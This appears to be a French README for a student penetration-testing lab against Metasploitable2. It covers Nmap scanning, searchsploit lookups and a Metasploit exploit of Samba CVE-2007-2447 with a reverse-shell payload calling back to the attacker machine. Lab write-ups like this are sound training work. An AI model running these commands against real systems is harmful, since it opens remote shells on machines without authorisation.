
Projet de pentest pratique utilisant Kali Linux contre Metasploitable2. Comprend le flux de travail complet : scan Nmap, énumération, exploitation via Metasploit (Samba CVE-2007-2447), validation post-exploitation et étapes d'atténuation. Le dépôt contient les commandes, les sorties et un rapport présentant à la fois les techniques offensives et les recommandations défensives.
Projet de stage 2 — Test d'intrusion sur Metasploitable2
Résumé : Ce projet illustre un flux de travail complet de test d'intrusion : reconnaissance, énumération, exploitation, validation post-exploitation et recommandations d'atténuation. La cible utilisée est Metasploitable2 et la machine d'attaque est Kali Linux.
Outils : Kali Linux (attaquant) Nmap (reconnaissance) Metasploit Framework (exploitation) SearchSploit / Exploit-DB (triage)
Étapes réalisées :
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Services identifiés (exemples) : vsftpd 2.3.4 (bannière du port 21), Samba smbd 3.x (port 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Services mis en correspondance avec des exploits potentiels (backdoor vsftpd, Samba username-map).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Obtention d'un shell interactif et validation du contexte utilisateur.id uname -aRésultat Un shell distant a été obtenu avec succès via un exploit Samba, le chemin d'attaque a été documenté et un plan d'atténuation a été produit. Les journaux complets et les sorties de commandes sont stockés dans le dossier scans/.